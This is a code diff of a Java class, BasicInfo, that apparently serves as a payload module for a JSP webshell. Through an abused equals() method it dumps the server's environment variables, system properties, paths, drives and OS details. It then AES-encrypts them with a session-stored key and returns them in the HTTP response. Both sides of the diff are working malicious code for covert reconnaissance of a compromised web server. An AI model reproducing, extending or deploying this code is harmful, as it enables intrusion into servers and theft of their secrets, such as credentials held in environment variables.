@@ -8,75 +8,107 @@ import java.io.File;
 import java.nio.charset.StandardCharsets;
 import java.util.HashMap;
 import java.util.Map;
+import java.util.Map.Entry;
+import java.util.Properties;
+import java.util.Set;
 
 public class BasicInfo {
+    public BasicInfo() {
+    }
+
     public boolean equals(Object obj) {
         PageContext page = (PageContext) obj;
         page.getResponse().setCharacterEncoding("UTF-8");
+        String result = "";
+
         try {
             StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>环境变量:</font><br/>");
-            Map<String, String> env = System.getenv();
-            for (String name : env.keySet()) {
+            Map env = System.getenv();
+
+            for (Object value : env.keySet()) {
+                String name = (String) value;
                 basicInfo.append(name + "=" + env.get(name) + "<br/>");
             }
+
             basicInfo.append("<br/><font size=2 color=red>JRE系统属性:</font><br/>");
-            for (Map.Entry<Object, Object> entry : System.getProperties().entrySet()) {
+            Properties props = System.getProperties();
+            Set entrySet = props.entrySet();
+
+            for (Object o : entrySet) {
+                Entry entry = (Entry) o;
                 basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
             }
-            String currentPath = new File("").getAbsolutePath();
+
+            String currentPath = (new File("")).getAbsolutePath();
             String driveList = "";
             File[] roots = File.listRoots();
-            for (int i = 0; i < roots.length; i++) {
-                driveList = driveList + roots[i].getPath() + ";";
+            File[] var11 = roots;
+            int var12 = roots.length;
+
+            for (int var13 = 0; var13 < var12; ++var13) {
+                File f = var11[var13];
+                driveList = driveList + f.getPath() + ";";
             }
-            Map<String, String> entity = new HashMap<>();
+
+            String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
+            Map entity = new HashMap();
             entity.put("basicInfo", basicInfo.toString());
             entity.put("currentPath", currentPath);
             entity.put("driveList", driveList);
-            entity.put("osInfo", System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch"));
-            String result = buildJson(entity, true);
+            entity.put("osInfo", osInfo);
+            result = this.buildJson(entity, true);
             String key = page.getSession().getAttribute("u").toString();
             ServletOutputStream so = page.getResponse().getOutputStream();
             so.write(Encrypt(result.getBytes(), key));
             so.flush();
             so.close();
             page.getOut().clear();
-            return true;
-        } catch (Exception e) {
-            e.printStackTrace();
-            return true;
+        } catch (Exception var15) {
+            var15.printStackTrace();
         }
+
+        return true;
     }
 
     public static byte[] Encrypt(byte[] bs, String key) throws Exception {
-        SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes(StandardCharsets.UTF_8), "AES");
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
         Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
         cipher.init(1, skeySpec);
-        return cipher.doFinal(bs);
+        byte[] encrypted = cipher.doFinal(bs);
+        return encrypted;
     }
 
-    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
+    private String buildJson(Map entity, boolean encode) throws Exception {
         StringBuilder sb = new StringBuilder();
         String version = System.getProperty("java.version");
         sb.append("{");
-        for (String key : entity.keySet()) {
+
+        for (Object o : entity.keySet()) {
+            String key = (String) o;
             sb.append("\"" + key + "\":\"");
-            String value = entity.get(key);
+            String value = ((String) entity.get(key));
             if (encode) {
+                Class Base64;
+                Object Encoder;
                 if (version.compareTo("1.9") >= 0) {
-                    getClass();
-                    Class Base64 = Class.forName("java.util.Base64");
-                    Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
+                    this.getClass();
+                    Base64 = Class.forName("java.util.Base64");
+                    Encoder = Base64.getMethod("getEncoder", (Class[]) null).invoke(Base64, (Object[]) null);
                     value = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
                 } else {
-                    getClass();
-                    Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
-                    value = ((String) Encoder2.getClass().getMethod("encode", byte[].class).invoke(Encoder2, value.getBytes(StandardCharsets.UTF_8))).replace("\n", "").replace("\r", "");
+                    this.getClass();
+                    Base64 = Class.forName("sun.misc.BASE64Encoder");
+                    Encoder = Base64.newInstance();
+                    value = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
+                    value = value.replace("\n", "").replace("\r", "");
                 }
             }
+
             sb.append(value);
             sb.append("\",");
         }
+
         sb.setLength(sb.length() - 1);
         sb.append("}");
         return sb.toString();
